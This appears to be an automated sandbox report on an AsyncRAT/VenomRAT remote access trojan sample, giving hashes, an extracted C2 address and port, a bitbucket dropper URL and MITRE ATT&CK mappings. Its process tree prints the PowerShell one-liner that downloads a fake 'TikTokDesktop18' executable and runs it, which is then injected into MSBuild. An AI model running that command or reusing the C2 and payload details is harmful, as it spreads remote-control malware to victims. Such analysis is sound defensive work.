asyncrat | 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1

General

Target

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
Size

89KB
MD5

834924ac31fd6b5978bad287da3f99f9
SHA1

3289c8848c485ededbc7600171d74e9570553376
SHA256

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
SHA512

feaaf94fd41de5e86fc90f4cc49a57326deb2f1edce1b96384e36924b81727ecabab9a88723348f8962f370564fd1565c1bea6f2230e6c28f710a55a50eb6639
SSDEEP

1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3OL:v7DhdC6kzWypvaQ0FxyNTBfAd

Score

10^/10

asyncrat venomrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

212.15.49.155:4449

Mutex

zuvtbmtrjnwecuy

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

Processes:

resource	yara_rule
behavioral2/memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp	VenomRAT

Venomrat family
venomrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
7	4408	powershell.exe
13	4408	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

Processes:

TikTokDesktop18.exe

pid	Process
2080	TikTokDesktop18.exe

Loads dropped DLL 1 IoCs

Processes:

TikTokDesktop18.exe

pid	Process
2080	TikTokDesktop18.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
4408	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
6	bitbucket.org
7	bitbucket.org

Suspicious use of SetThreadContext 1 IoCs

Processes:

TikTokDesktop18.exe

description	pid	Process	procid_target
PID 2080 set thread context of 4500	2080	TikTokDesktop18.exe	91

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exeTikTokDesktop18.exeMSBuild.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TikTokDesktop18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exeMSBuild.exe

pid	Process
4408	powershell.exe
4408	powershell.exe
4500	MSBuild.exe
4500	MSBuild.exe
4500	MSBuild.exe
4500	MSBuild.exe
4500	MSBuild.exe
4500	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeMSBuild.exe

description	pid	Process
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	4500	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid	Process
4500	MSBuild.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.execmd.execmd.exeTikTokDesktop18.exe

description	pid	Process	procid_target
PID 1428 wrote to memory of 436	1428	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe	84
PID 1428 wrote to memory of 436	1428	017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe	84
PID 436 wrote to memory of 4408	436	cmd.exe	85
PID 436 wrote to memory of 4408	436	cmd.exe	85
PID 436 wrote to memory of 3680	436	cmd.exe	88
PID 436 wrote to memory of 3680	436	cmd.exe	88
PID 3680 wrote to memory of 2080	3680	cmd.exe	89
PID 3680 wrote to memory of 2080	3680	cmd.exe	89
PID 3680 wrote to memory of 2080	3680	cmd.exe	89
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91
PID 2080 wrote to memory of 4500	2080	TikTokDesktop18.exe	91

C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1428
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\system32\cmd.exe
    cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3680
  - - C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
      C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2080
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat

Filesize
260B

MD5
1904675eec0f302424c4bde0956dab54

SHA1
267c3174e35e0e2a7d104f98b3326f313f2e464e

SHA256
45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6

SHA512
fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe

Filesize
501KB

MD5
e619fff5751a713cf445da24a7a12c94

SHA1
9fc67a572c69158541aaaab0264607ada70a408c

SHA256
11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9

SHA512
07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snvlrfet.khw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\gdi32.dll

Filesize
256KB

MD5
8d662564d514751028c65d96c696271f

SHA1
8e27943b7b901a808d39a7ee6977e1d3769a15fb

SHA256
86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b

SHA512
0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef

Download Submit
memory/2080-22-0x000000007411E000-0x000000007411F000-memory.dmp

Filesize
4KB

Download
memory/2080-23-0x00000000005C0000-0x0000000000646000-memory.dmp

Filesize
536KB

Download
memory/2080-24-0x0000000002950000-0x0000000002956000-memory.dmp

Filesize
24KB

Download
memory/2080-25-0x000000000ABE0000-0x000000000B10C000-memory.dmp

Filesize
5.2MB

Download
memory/4408-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

Filesize
10.8MB

Download
memory/4408-18-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

Filesize
10.8MB

Download
memory/4408-13-0x00000220FF450000-0x00000220FF472000-memory.dmp

Filesize
136KB

Download
memory/4408-8-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

Filesize
10.8MB

Download
memory/4408-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp

Filesize
8KB

Download
memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp

Filesize
176KB

Download
memory/4500-34-0x0000000005670000-0x0000000005C14000-memory.dmp

Filesize
5.6MB

Download
memory/4500-36-0x0000000005370000-0x0000000005402000-memory.dmp

Filesize
584KB

Download
memory/4500-37-0x0000000005350000-0x000000000535A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads